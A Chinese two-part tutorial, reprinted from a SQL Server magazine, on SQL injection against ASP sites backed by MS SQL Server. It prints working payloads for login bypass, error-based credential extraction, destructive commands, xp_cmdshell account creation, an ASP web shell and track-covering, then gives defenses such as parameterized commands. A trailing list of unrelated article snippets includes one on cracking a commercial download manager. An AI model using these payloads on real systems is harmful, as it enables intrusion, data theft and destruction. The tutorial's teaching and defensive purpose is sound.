前言

计算机系统的安全一直是你我所重视的,但或许你一直在替系统安装修正文件,防毒软件,架设防火墙,划定非军事区等等,但可能由于撰写程式代码的疏忽,你的背后正有一个自己营造的大漏洞。

sql injection – 骇客的 sql填空游戏

在现今的应用程式架构中,大部分都含有数据库,以容纳各式各样的资料。而在各类型的数据库中,又以结构化查询语言(sql structure query language)为基础的关系型数据库管理系统(rdbms relational database management system)最为流行。

一般的程式设计师在存取数据库时,往往是利用 visual basic等第三代语言来组织 sql 语言,然后再传递给关系型数据库系统执行,以建立或删除数据结构,赋予或移除使用权限,乃至于新增、修改、删除或查询资料。因为关系型数据库所有的执行动作皆是遵循 sql 命令,所以透过此种方式能非常方便地完成各种资料维护工作。但也正因为 sql 语言无所不能,所以稍有漏洞就会让骇客有机可乘。这两期文章就针对这个主题做一个深入的探讨。

网站的资料存取一般来说是比较危险的,因为网际网络是个开放的环境,而不像一般公司内部网络,除了有计算机本身的安全设计,还能过滤筛检员工的身分背景。网际网络上龙蛇杂处,大部分的使用者都循规导矩,但少数图谋不轨的人却处心积虑地要侵入我们的系统,窃取有价值的资料。但一般的网管人员及网页设计师,可能在安全设定上有着重重防范,如架设防火墙,设计非军事区(dmz),限制网站登入者的身分等等。但由于缺乏对 sql 语言及数据库管理系统的认知,而大开系统的后门。

本文针对微软的 asp 网站架构搭配 ms sql server 做一个探讨及示范,希望能提供各网站的管理人员对 sql injection 的入侵方式有个基本的认识,就笔者在撰写本文时,利用搜寻网站随意找几个有会员机制的网站来测试,其中多数都有被此类方式侵入的危险,大家不可不慎。
笔者在此先建立一个一般会员网站登入网页的范例,及相关资料表的架构如下:
资料表的 schema 如程式代码列表 1。

create table [tbluser] (
     [userid] [int] identity (1, 1) not null ,
     [username] [nvarchar] (50) not null ,
     [password] [nvarchar] (50) not null ,
     [pri] [tinyint] null constraint [df_tbluser_pri] default (0),
     constraint [pk_tbluser] primary key clustered
     ([userid])
)

程式代码列表 1:存放会员资料的资料表 schema。

并在资料表加入两笔资料内容

insert tbluser(username,password,pri) values(admin,adminpass,10)
insert tbluser(username,password,pri) values(byron,byronpass,10)

登入网页的撰写方式如程式代码列表 2。

<%
if request("username")<>"" and request("pass")<>"" then
dim cnn,rec,strsql
set cnn=server.createobject("adodb.connection")
with cnn
.connectionstring=application("conn")
.open

利用使用者输入的资料来组合 sql 语法
strsql="select * from tbluser where username=" & _
request("username") & " and password=" & request("pass") & ""
直接交给 sql server 执行,这是最危险的地方
set rec=.execute(strsql)
end with
if not rec.eof then
session("username")=request("username")
response.write "欢迎光临 " & request("username")
else
response.write "你的帐号/密码输入错误"
end if

else
%>
<form action="login.asp">
使用者名称:<input name="username"><p>
密码:<input name="pass" >
<p>
<input type="submit" value="确定">
</form>
<%
end if
%>

程式代码列表 2:简单的 asp 登入网页。

在程式代码列表 2 中的 asp 网页利用 vbscript 来组合查询使用者帐号、密码的 sql 查询语法,逻辑相当简单,若资料表中存有符合的帐号、密码记录,则回传的 recordset 的 eof 属性是 false,该使用者就算正确登入。
针对此种网页,我们以下就开始利用 sql injection 的技巧来”骇”这个网站吧!

剪接语法

利用所有已知的使用者名称登入1:例如在网咖偷偷地观察某个使用者用什么样的帐号登入到哪个网站等等,或着先试试一般管理人员可能建立的使用者名称,如:admin、administrator、supervisor、sa 等等。

在需要输入使用者名称的地方键入以下的内容2:
admin’--
而密码字段随便乱输入,对于会被执行的整句 sql 没有什么关系。示意图如图 1。

图 1:利用已知的会员名称登入,让程式代码跳过密码检查。

你能试着将输入使用者名称的内容和程式代码列表 2 的 sql 语法做个整理,将会发现实际传给 sql server 的语法如下

select * from tbluser where username=admin-- and password=asdf

关键就是原先的 and 子句被 “--" 标示成说明,也就是 sql server 仅仅执行

select * from tbluser where username=admin

自然,若有该使用者存在,则这个 sql 查询语法就传回该记录的所有字段内容。再按照程式代码列表 2 的判断方式:传回的 recordset 是否有记录,若有就算登入验证成功。则骇客就能轻易地以该使用者的身分进入了。
用未知的使用者名称登入:若没有已知的帐号,也能用以下的方式输入到使用者名称字段,便能大大方方地侵入:

‘ or 1=1--

sql server 所接收的整个语法变成:

select * from tbluser where username= or 1=1-- and password=asdf

因为加上的 or 1=1,则不管之前的条件为合,只要某个条件为真,整个判断式就都为真,因此回传的 recordset 对象包含了全部的会员记录。也导致程式代码列表 2 中的 recordset 对象 eof 属性为 false。

利用错误讯息

获取字段数量和名称

微软为了方便 asp 的程式研发者能顺利地除错,因此每当 script 执行错误时,都会透过预设的 <系统所在磁盘>\winnt\help\iishelp\common\500-100.asp 网页将发生错误的原因回传到前端,对于研发者来说,这是个非常方便的错误呈现方式。但骇客也能利用这个错误讯息取得原始 asp 中的查询语法,并从中了解数据库中资料表的架构。例如在使用者名称字段输入:
having 1=1--
则系统会传回如图 2 的错误讯息。


图 2:故意制造错误,从错误讯息中找寻蛛丝马迹。

由图 2 能知道存放使用者的资料表名称是 tbluser,且查询中有一个字段叫 userid。因此我们再次输入:
group by userid having 1=1--
这回错误讯息如图 3。


图 3:利用错误讯息来了解资料表大致结构。

再次在图 3 的错误讯息中可知查询的字段更有 username,因此继续以下列方式来查询3。

group by userid,username having 1=1--

利用上述方式取到完整查询语法后,也就是输入以下的语法,但不再造成执行时期错误:

group by userid,username,password,pri having 1=1--

因为整个传递到 sql server 的语法变成:

select * from tbluser where username=group by userid,username,password,pri having 1=1-- and password=asdf

如此列出所有字段的 group by 方式几近等于没有 group by,但语法完全正确表示所有的字段都已包含在其中了。骇客就此能约略估计资料表的字段结构。

在输入帐号的地方执行以下语法便能加入自订的使用者到资料表中。

;insert into tbluser values(hacker,hacker,10)--

获取字段资料型态

若有数据域位格式不对,导致无法加入自订使用者,也能利用下列语法传回的错误讯息来判读数据域位格式:

union select abc,1,1,1 from tbluser --

结果传回如图 4 的错误讯息。


图 4:利用错误讯息来判断字段的资料型态。

在这里我们透过 union 语法来组合两句 select 查询,第一句 select 语法的第一个字段 userid 是 int 格式,但对应的第二句 select 语法;第一个字段的资料是 varchar 格式的 ‘abc’,因此出现如图 4 的错误讯息。骇客也由此得知资料表第一个字段的资料型态是 int。有耐心地把一个个字段测试完毕后,便能得到整个资料表的字段格式。

获取会员的帐号密码

利用这个技巧,还能再进一步获取使用者的帐号和密码,例如先以下列语法询问帐号:

union select username,1,1,1 from tbluser where username>a--

iis 回传错误讯息如图 5。

图 5:利用错误讯息来取得使用者帐号和密码。

因为传回的记录”admin”是 nvarchar 格式,而透过 union 对应到原先 int 数据域位,因此有图 5 的错误讯息。由以上的错误能得知有一个称为”admin”的帐号存在,之后再以下列语法获得该帐号的密码。

union select password,1,1,1 from tbluser where username=admin--

错误讯息如图 6。


图 6:利用错误讯息取得帐号 admin 的密码。

之后再继续以下列语法来获得其他人的帐号密码。

union select username,1,1,1 from tbluser where username>admin--

错误讯息如图 7。


图 7:依序透过相同的机制取得其他人的帐号密码。

依次替换掉 where username > 的条件内容,就能取得资料表中所有的帐号和密码组合。
骇客甚至能透过以下的语法将整个使用者帐号密码串成字符串:在输入使用者帐号的字段填入如程式代码列表 3 的 sql 语句。

;declare @str varchar(8000) set @str=@ select @str=@str+ +username+/+password from tbluser where username>@str select @str as idpass into tblhacker--

程式代码列表 3:将所有的使用者数据组成字符串,放入自订的数据表中。

在程式代码列表 3 中,先宣告一个长度为 8000 的字符串变量 @str,再将整个 tbluser 资料表的内容组成一个字符串放到变量 @str 之内,最后再利用 select … into… 语法把 @str 变量的内容放到自建的资料表 tblhacker 之中。

然后再利用前述故意营造错误的技巧换回资料内容。

union select idpass,1,1,1 from tblhacker--

结果如图 8。


图 8:取回全部的会员帐号密码资料。

当然事后要做一个清除的动作,以避免系统管理人员的注意,依然在名称字段输入如下的内容。

; drop table tblhacker--

在本期的文章中,笔者介绍了一般的 sql injection 攻击,相信你不是感到兴奋且跃跃欲试,想要找几个网站来开刀,就是感到毛骨悚然,赶快检视一下自己的系统。不管你是何者,笔者期盼本文不致遭到误用,若有心测试别站的安全程度,建议你将成果告知该站的管理人员,让整个网际网络的世界更为安全,一般人才会愿意流涟在其上,而我们信息人员才有更好的未来。

在下期文章中,笔者将继续介绍进阶的 sql injection 攻击,并提出因应的防范之道,期待再次和你见面。

后记:本文所举各例,并非单指microsoft sql server而言,事实上所有关系型数据库如oracle等均是如此。同时,本文所举各例,并非单指asp而言,事实上对所有动态网页如jsp、php等均是如此(即使你的系统还停留在cgi技术也是相同),奉劝各位实时检视你的系统,防患未然。

(本文由sql server电子杂志 http://www.sqlserver.com.tw 授权台湾微软独家转载)

注释:

1

就笔者观察,现今非常多的有会员机制的网站在登入时都是以身分证字号当作登入帐号,所以骇客只要想办法拿到某个会员的身分证字号就能试试这个方法。

2

以下的 sql injection 登入方式都是只利用使用者帐号的字段,输入不同的 sql 语法,以组织各种可能的执行方式,而都利用 “--” 将后面的密码字段标示成 sql 说明。

3

骇客的第一特质:有耐心。笔者因此就没有做骇客的天赋,为了撰写这篇文章,笔者反反复覆地测试各个网站,重复的过程非常乏味,所得结论是既然有这个精力,笔者宁愿多看点书,赚取正当的收入。



 

 

sql injection – 骇客的 sql填空游戏(下)

sql server 本身提供了非常多的函数、预存程式、延伸预存程式来辅助 t-sql,好让程式设计师透过 t-sql 完成商业逻辑运作所需的预存程式。但一般的使用者较熟悉以 visual basic 等程式语言来撰写存取资料的程式,因而对此类的功能所知不多,更别提要怎么防范骇客透过这一类的功能来遂行其目的。

使用具破坏力的语法

以下列举部分的功能稍做讨论。

停掉 sql server 的执行

直接输入 shutdown 命令,需求 sql server 停止执行。在网页上输入帐号的地方能直接键入以下语法便可:

;shutdown--

破坏内容

当然,只要权限够,也能执行有破坏性的 sql 语法1 。如删除某个数据库:

;drop database <数据库名称>--

删除数据库内某个资料表:

;drop table <资料表名称>--

清空某个资料表:

;truncate table <资料表名称>--

抑或是以 delete 清空资料表:

;delete from <资料表名称>--

使用进阶且功能强悍的延伸预存程式

这一类的预存程式多以 xp_ 开头,存放在 master 系统数据库的延伸预存程式中。有趣的是大部分的延伸预存程式在 sql server 所附的线上说明中都没有列出来,也没有说明。笔者本想到微软网站利用全文检索找寻这些延伸预存程式的蛛丝马迹,以列表讨论,但发现大多是无可奉告(undocumented),看来延伸预存程式虽然功能强大,但微软并不鼓励大家使用。
笔者选几个较有趣的分别介绍。

执行其他应用程式

xp_cmdshell 应该是大家最常使用的延伸预存程式之一,透过这个延伸预存程式能 sql server 的系统帐号来执行所有应用程式。

以下程式代码列表 1 直接利用操作系统所附的 net 工具程式,在 windows 系统中加入一个使用者帐号 hacker ;没有密码,并将该帐号加到 sql server,再放入到最大的使用者权力群组 sysadmin:

; exec master..xp_cmdshell net user hacker /add exec master..sp_grantlogin byron-xp\hacker exec master..sp_addsrvrolemember byron-xp\hacker,sysadmin--

程式代码列表 1:加入自订的使用者,并赋予该帐号最大的权限。

若你还开放网际网络存取 sql server预设使用的 tcp 1433 埠,则骇客将有机会唐而皇之地控管 sql server。

和 registry 相关的系统预存程式

sql server 提供了大量和 registry 相关的延伸预存程式,以 xp_reg 开头作为代表2。内容有:

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite

骇客能利用此类的延伸预存程式存取系统的注册资料,例如查询该机器上有哪些共享目录,范例如程式代码列表 2。再利用上一期的技巧,以错误讯息来呈现结果。

create table tblsharedir(dirname varchar(100), diratt varchar(100))
insert tblsharedir exec master..xp_regenumvalues hkey_local_machine,system\currentcontrolset ervices\lanmanserver hares

程式代码列表 2:利用 xp_regenumvalues 取得系统的共享目录。

再利用上篇文章介绍的以错误讯息来呈现结果的技巧,或是以下文中透过 bcp.exe 工具程式将 tblsharedir 输出成档案,都能取得想要的结果。

和 ole automation/com 对象相关的延伸预存程式

sql server 提供了一组存取服务器外部 ole 对象相关的预存程式。他们分别是:

sp_oacreate
sp_oadestroy
sp_oamethod
sp_oagetproperty
sp_oasetproperty
sp_oageterrorinfo
sp_oastop

你能用他们来建立 ole 对象(一般com 对象就能了,但要支持 idispatch 接口),执行对象的方法,读取和修改属性,进行错误处理。但他们无法响应一般 ole 或 com 对象的事件。

有了 com/ole 对象的建立和执行,对于控制系统来说可算是如虎添翼,无所不能了。稍举个例子,骇客能利用他来取得有兴趣的网页的原始码,如程式代码列表 3:

;declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null, c:\winnt ystem32\cmd.exe /c type c:\inetpub\wwwroot qlinject\login.asp > c:\inetpub\wwwroot qlinject\test.txt--

程式代码列表 3:取得 login.asp 网页的内容。

在程式代码列表 3 中,利用 sp_oacreate 建立 “wscript.shell” 对象,并利用 sp_oamethod 呼叫 “wscript.shell” 对象的 run 方法,以执行操作系统命令接口工具程式 cmd.exe,将 login.asp 输出到 test.txt 档案中,这时骇客只要在网页上输入 http://.../.../test.txt 就能看到 login.asp 写作的方式,作为下一步侵入的基本信息。

当然,骇客也能利用 scripting.filesystemobject 对象来建立一个 asp 网页后门,语法如程式代码列表 4 所示:

declare @fs int,@fi int
exec sp_oacreate scripting.filesystemobject,@fs output
exec sp_oamethod @fs,createtextfile,@fs output,c:\inetpub\wwwroot qlinject hell.asp,1
exec sp_oamethod @fs,writeline,null,<% set objshell=server.createobject("wscript.shell") : objshell.run request("cmd") %>

程式代码列表 4:建立 asp 后门网页。

从此透过 url 就能执行所有执行文件,范例如下:

http://localhost/sqlinject/shell.asp?cmd=c:\winnt ystem32\cmd.exe /c type c:\inetpub\wwwroot qlinject\login.asp > c:\inetpub\wwwroot qlinject\test.txt

其他相关的延伸预存程式

这一类的延伸预存程式,你可能要小心的更有:

延伸预存程式的名称

用途

使用范例

xp_availablemedia

显示系统上可用的磁盘驱动器,如 c:\。

xp_availablemedia

xp_dirtree

显示某个目录下的子目录和档案架构。

xp_dirtree c:\inetpub\wwwroot\

xp_enumdsn

列出系统上已设定好的 odbc 资料来源名称(dsn data source name)。

xp_enumdsn

xp_enumgroups

列出操作系统上的使用者群组及该群组的说明。

xp_enumgroups

xp_getfiledetails

获取某个档案的相关属性。

xp_getfiledetails c:\inetpub\wwwroot qlinject\login.asp

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都能接在参数列的最后方,以逗号隔开。

dbo.xp_makecab
c:\test.cab,mszip,1,
c:\inetpub\wwwroot qlinject\login.asp,
c:\inetpub\wwwroot qlinject ecurelogin.asp


xp_ntsec_enumdomains

列出服务器的网域名称。

xp_ntsec_enumdomains

xp_servicecontrol

停掉或激活某个服务。

xp_servicecontrol stop,schedule
xp_servicecontrol start,schedule

dbo.xp_subdirs

只列某个目录下的子目录。

dbo.xp_subdirs c:\

xp_terminate_process

停掉某个执行中的程式,但赋予的参数是 process id。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就能看到每个执行程式的 process id

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab c:\test.cab,c:\temp,1

以上表列的延伸预存程式是笔者在 master 系统数据库中,寻找名称比较有趣的;经过一一测试的结果。但不代表能用来侵入系统的延伸预存程式都已完全列出,毕竟骇客的创意屡屡翻新,你必须要时时谨慎小心。

sql server 的工具程式

透过 sql server 所提供的一些工具程式能直接将资料表的内容输出成档案,例如透过 bcp 的 out 参数,将储存会员资料的资料表整个输出成档案,范例如下:

bcp northwind.dbo.tbluser out c:\inetput\wwwroot qlinject\user.txt -c -usa -p -sbyron-xp

当然,isql.exe 和 osql.exe 也都能办到同样的功能,例如:

osql -usa -p -sbyron-xp -dnorthwind -oc:\inetpub\wwwroot qlinject\users.txt -q"select * from tbluser"

这一类的工具程式能搭配前文的 xp_cmdshell 延伸预存程式,或是交由利用 sp_oa 系列预存程式建立的木马 asp 来执行,都能达到窃取资料的目的。

对于预防 sql injection 的建议

综合以上各种的侵入技巧,笔者在此归纳一些维护系统安全的建议。
尽量地利用 asp 或 asp.net 在服务器端检查和限制输入变量的型别和长度,过滤掉不必的内容。要注意的是这些检查不要放在前端。
就算在前端利用 html input 卷标的 maxlength 属性,或是以 jscript 撰写程式来设定字段长度的限制,只要将该网页另存新档,修改内容后(一般只要改写 form 的 action 属性及 input 的 maxlength 属性),重新以浏览器开启再执行便可避过这些浏览器端的检查。  asp 程式登入 sql server 的帐号不要使用 sa,或所有属于 sysadmin 群组的帐号,避免有过大的权限。 sa 一定要有强固的密码,尤其是 sql server 7.0 以前的版本,在装机时预设 sa 没有密码,而一般管理者装完后也忘了或怕麻烦而不更改密码。 利用 ado 的 command 对象或 ado.net 的 sqlcommand class 来透过参数执行 sql 语法,直接以 adodb 的 connection 对象执行预存程式的写法相同糟糕。范例如下:
exec spxxx 参数,…

因为骇客所加入的 sql 语法相同能执行:

exec spxxx 参数,…;shutdown

我们能建立一个预存程式程式代码列表 5:

ecreate proc spuseraccount
@username nvarchar(50),@password nvarchar(50)
as
select username,password from tbluser
where username=@username and password=@password

程式代码列表 5:用来找寻符合的使用者帐号密码的预存程式。

同时将整个 asp 的查询换成如程式代码列表 6 的写法:

<%
if request("username")<>"" and request("pass")<>"" then
dim cnn,rec,strsql,cmd
set cnn=server.createobject("adodb.connection")
with cnn
.connectionstring=application("conn")
.open
end with
透过 adodb.command 对象来搭配预存程式,骇客就无法
利用组合 sql 字符串的方式来侵入系统
set cmd=server.createobject("adodb.command")
with cmd
.activeconnection = cnn
.commandtext = "spuseraccount"
.commandtype = 4 adcmdstoredproc
.parameters.append .createparameter("username", 202, 1, 50, request("username"))
202 代表 advarwchar,1 代表 adparaminput
.parameters.append .createparameter("password", 202, 1, 50, request("pass"))
set rec = .execute()
end with
if not rec.eof then
session("username")=request("username")
response.write "欢迎光临 " & request("username")
else
response.write "你的帐号/密码输入错误"
end if
else
%>

程式代码列表 6:利用 adodb 的 command 对象来存取预存程式。

如程式代码列表 6 中灰色的程式代码区块,将存取 sql server 预存程式的方式改以透过 adodb 的 command 对象,如此骇客就不能用加入自订 sql 的语法来需求 sql server 执行额外的动作。
改掉预设的 web 虚拟路径,不要使用 iis 装好后预设的 <系统所在磁盘>\inetpub\wwwroot 路径,否则利用前述的档案存取方式,非常容易在该目录下动手脚。 不要显示错误讯息到前端。
利用 vbscript 语法的 on error resume next,并搭配 if err.number<>0 then 的错误处理方式,自行将错误重导到适当的错误处理网页,如此系统将更稳固,且骇客也不易透过错误讯息来探知系统的内部运作方式。
或着,也能修改<系统所在磁盘>\winnt\help\iishelp\common\500-100.asp 预设网页,最简单的方式就是将他更改名字3。  将用不到但功能强大的延伸预存程式删除。  监视系统的执行。  防火墙关闭 tcp 1433/udp 1434 埠(port)对外的联机4 。  随时注意是否有新的修补程式要上。
以上是针对 sql injection 防护方式的建议,但我们应该谨记于心的是世界上没有绝对安全的系统,只有自己时时小心,多看多听骇客们是否有翻新的手法,系统是否有异常的状况,唯有不断加强系统的安全措施,才能将危害降至最低。

相关网址

以下是一些关于 sql 及系统安全的网址,提供给大家参考。
http://www.sqlserver.com.tw/
http://www.microsoft.com/sql/
http://www.microsoft.com/security/
http://www.microsoft.com/security/security_bulletins/ms02020_sql.asp
http://www.sqlsecurity.com/
http://www.nextgenss.com/
http://www.atstake.com/
http://www.securityfocus.com/
http://www.appsecinc.com/

(本文由sql server电子杂志 http://www.sqlserver.com.tw 授权台湾微软独家转载)

注释:

1

就笔者的观察,一般的程式设计师多喜欢用 sql server 最大的预设帐号 sa 来存取资料。因此给予骇客予取予求的权力。

2

这里表列的延伸预存程式能透过 enterprise manager 或 query analyzer 看到,不过在 sql server 线上丛书未找到相关资料。

3

笔者不建议一开始就删除500-100.asp,因为这会导致非常难替程式除错。建议在程式研发完成上线后,将 500-100.asp 更改名称。在自行撰写的 asp ?首加入 on error resume next/if err.number <> 0 then 等,错误处理应该是在程式撰写时就要注意的程式架构,若为了除错方便,能先以单引号让 on error resume next 语法成为说明。

4

有报告显示现今有网络蜘蛛专门寻找在网际网络上,能直接透过 tcp 1433/udp 1434 埠(port)存取,但 sa 帐号没有设定密码的 sql server,在找到该服务器后便利用前述的技巧取得对系统的控制权。

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. Unrooted Tests问题

    问题如图所示:我将被测试的方法单独用一个类在main方法中执行,发现了问题所在,报了java.lang.NoSuchMethodError: javax.persistence.OneToMany.orphanRemoval()Z的错误,这个错误是由于javaee.jar中的javax.persistence包中的ManyToOne.class、OneToOne.class等部分类与hib…...

    2024/3/14 16:39:31
  2. android 屏幕适配 今日头条 pt(使用blankj库)

    第一步:导入库 在module中的build.gradle中添加如下代码 dependencies {implementation "com.blankj:utilcode:1.25.9" }第二步:复写BaseActivity的getResources方法 public abstract class BaseActivity extends AppCompatActivity {@Overridepublic Resources ge…...

    2024/3/27 5:14:44
  3. IDM 下载器破解,亲测有效,转载

    首先你要下载一个IDM V6.00 (含)以上的版本 推荐官网下载:http://www.internetdownloadmanager.com/download.html破解程序下载:链接:http://pan.baidu.com/s/1pKW7Ztx 密码:7wow 安装IDM后,运行破解程序~选择IDM安装目录中的 IDMan.exe输入用户名,然后点击Patch~然后就成…...

    2024/3/14 16:39:29
  4. 关于static class的意义和一些解释

    在java中:1。final 篇 final 做为一个独立的存在,也表现的与众不同。一般情况都可以理解为 cant be changed. 1)final data: 实现constant语义。说明这个值:在编译时不会变;在运行时也不能被改变。 在java中,提供了blank final:允许大家将初始化的动作延迟到construct…...

    2024/3/14 10:36:00
  5. 浅谈CSRF攻击方式

    一.CSRF是什么?CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。二.CSRF可以做什么?你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名…...

    2024/3/14 16:39:27
  6. android 绕过R文件,通过代码获取styleable的属性

    都知道用 context.getResources().getIdentifier 获取 id,drawable等资源id,今天遇到个问题,自定义控件中要获取styleable,不能使用R文件,但是R.styleable.rootName返回一个int[],不能用上边的方法.解决方法 :R.styleable.xxx 返回的 int[] 由自己来创建 定义styleable属性 :&l…...

    2024/3/16 21:52:17
  7. 如何使用万能地图下载器下载矢量路网

    矢量路网地图是智能交通诱导和汽车导航等系统的构建基础,有极高的应用价值,现有绘图方法要么工作周期较长,要么难以获取最新的数据源。当前路网地网获取方法主要是传统测绘方法,其运用测绘仪器及测绘学原理进行实地测绘,并将测绘得到的道路网络地图绘制于图纸上或存储于磁…...

    2024/3/14 16:39:26
  8. Oracle SQL执行计划与优化

    目录系统函数UserenvROWID、ROWNUM分析Oracle索引扫描四大类DML语句-MERGEDML语句-CALL账号与日期的命令oracle table-lock的5种模式EXPLAIN PLAN查看相关EXPLAIN PLAN总结SQL优化器如何进行评估优化执行计划稳定性深入研究Oracle查询优化4大方面的主要途径SQL优化例子 系统函数…...

    2024/3/14 16:39:24
  9. Weblogic优先加载jar包配置

    weblogic自带了很多jar包 当工程中的jar和weblogic自带jar版本不一致时 往往会出现错误。 比如常见的:java.lang.NoSuchMethodError: javax.persistence.OneToOne.orphanRemoval()Z 为了解决在weblogic中jar包冲突的问题 你可以在web-inf下创建一个weblogic.xml 内容如: &…...

    2024/3/14 16:39:25
  10. 菜鸟入坑UOS的日记--UOS下安装electron开发环境

    @[TOC](这里写自定义目录标题)UOS下安装electron开发环境 关于国产操作系统UOS的安装,已经遍地都是,小编我很反感无意义的转发,正好赶上要用electron做项目,所以第一篇CSDN的博文就从在UOS操作系统中安装electron开始 安装辅助工具 安装electron需要一些辅助工具,如git等,…...

    2024/3/14 16:39:22
  11. 探秘static——类不需实例化就能用?

    一般情况下,需要用到某个类的时候,都必须先实例化这个类,才能对其进行调用。在编程过程中发现,有些类不用实例化就可以直接拿来使用,使用它的字段、方法等等。这时候,靠的就是static作用。static英文意思为“静止的,静态的”,在OOP中可以作为修饰符,类、字段、属性、方…...

    2024/3/14 16:39:21
  12. Electron中通过net的API发出HTTP请求

    场景用HTML和CSS和JS构建跨平台桌面应用程序的开源库Electron的介绍以及搭建HelloWorld:https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/106413828Electron怎样进行渲染进程调试和使用浏览器和VSCode进行调试:https://blog.csdn.net/BADAO_LIUMANG_QIZHI/articl…...

    2024/3/13 22:25:24
  13. hibernate3.5和spring结合使用annotation时onetomany的bug

    java.lang.NoSuchMethodError: javax.persistence.OneToMany.orphanRemoval()Z 。 我程序出现找个错误,主要是在建立关系之后,如果实体,没有通过注解建立关系,就不会出现错误。 单个的hibernate3.5.2用起来没有任何问题,一结合spring3.0就报错。 解决办法:降低 hibernate的…...

    2024/3/13 22:25:23
  14. android通过资源名称去获得资源ID

    Resources resources = context.getResources(); int indentify = resources.getIdentifier(context.getPackageName()+":drawable/"+iconName, null, null); if(indentify>0){ icon = resources.getDrawable(indentify); } 以下是getIdentifier的API文档,可见最…...

    2024/3/13 22:25:24
  15. SQL优化---SQL执行的先后顺序

    标准的SQL 的解析顺序为:FROM 子句;ON 子句;OUTER(join)子句; 组装来自不同数据源的数据WHERE 子句 基于指定的条件对记录进行筛选GROUP BY 子句 将数据划分为多个分组使用聚合函数进行计算使用HAVING子句筛选分组计算所有的表达式SELECTDISTINCT使用ORDER BY对结果集进行排…...

    2024/3/13 22:25:21
  16. Electron: 从零开始写一个记事本app

    https://www.jianshu.com/p/57d910008612/Electron介绍简单来说,Electron就是可以让你用Javascript、HTML、CSS来编写运行于Windows、macOS、Linux系统之上的桌面应用的库。本文的目的是通过使用Electron开发一个完整但简单的小应用:记事本,来体验一下这个神器的开发过程。本…...

    2024/3/14 16:39:21
  17. 网易云音乐批量下载器v1.1软件介绍(修正版)

    网易云音乐批量下载器简介网易云音乐批量下载器v1.1 软件介绍1.编写初衷2.界面展示3.使用方法如何获取cookie?4.其他说明5.下载地址 网易云音乐批量下载器v1.1 软件介绍 1.编写初衷 就在最近几个月,作为网易云音乐忠粉的我,迷上了从上网站上面抓包下载音乐,但是那样效率太…...

    2024/3/14 16:39:20
  18. const和static的作用以及区别

    Static: 存储方式: 定义一个static变量时,编译器会在静态存储区为它分配空间,而不是在栈上。1. static变量如果声明在函数体中,它的作用范围是整个函数体。 需要注意它只会分配一次内存。所以多次调用这个函数不会多次给static变量重新赋值。因此它的值会保持上次调用时的…...

    2024/3/14 16:39:20
  19. Android设置手机系统字体大小对应用的影响

    项目中也遇到上述问题,主要有两种方式解决:1. 布局文件中字体单位设置一般是sp,这也是谷歌推荐的(sp单位会随着手机系统字体大小设置的变化而变化);所以我们可以将单位由sp改为dp 2. 在基类Activity中重写下面方法:@Override public Resources getResources() {Resources …...

    2024/3/14 16:39:17
  20. Hibernate 3.6中@OneToMany注解部署到WebSphere7上报错的解决办法

    项目中使用到了Hibernate 3.6,在PO类中使用了@OneToMany注解 在Tomcat上部署运行正常,但是部署到webSphere7上出现问题,报错如下:Caused by: java.lang.NoSuchMethodError: javax/persistence/OneToMany.orphanRemoval()Zat org.hibernate.cfg.AnnotationBinder.processEle…...

    2024/3/14 16:39:17

最新文章

  1. Linux之冯诺依曼体系,操作系统,进程的理解,进程状态,以及进程的优先级

    个人主页&#xff1a;点我进入主页 专栏分类&#xff1a;C语言初阶 C语言进阶 数据结构初阶 Linux C初阶 算法 欢迎大家点赞&#xff0c;评论&#xff0c;收藏。 一起努力&#xff0c;一起奔赴大厂 目录 一.冯诺依曼体系 二.操作系统 2.1概念 2.2结构示意图&…...

    2024/3/29 22:36:32
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. C#面:简单介绍 FileMode 枚举成员

    C# 的 FileMode 枚举类型定义了在文件操作中使用的不同文件访问模式。 它包含以下成员&#xff1a; FileMode.Create&#xff1a;如果文件不存在&#xff0c;则创建一个新文件。如果文件已存在&#xff0c;则覆盖原有文件。FileMode.CreateNew&#xff1a;创建一个新文件。如果…...

    2024/3/29 21:32:23
  4. 【Word自动化办公】使用python-docx对Word进行操作

    目录 一、环境安装 二、文档各组成结构获取 2.1 组成结构讲解 2.2 段落run对象的切分标准 三、获取整篇文档内容 四、写入指定样式的数据 4.1 通过add_paragraph与add_run参数添加样式 4.2 单独设置文本样式 五、添加标题 六、换行符&换页符 七、添加图片数据 …...

    2024/3/29 13:54:49
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/3/29 18:08:39
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/3/29 18:08:34
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/3/29 2:45:46
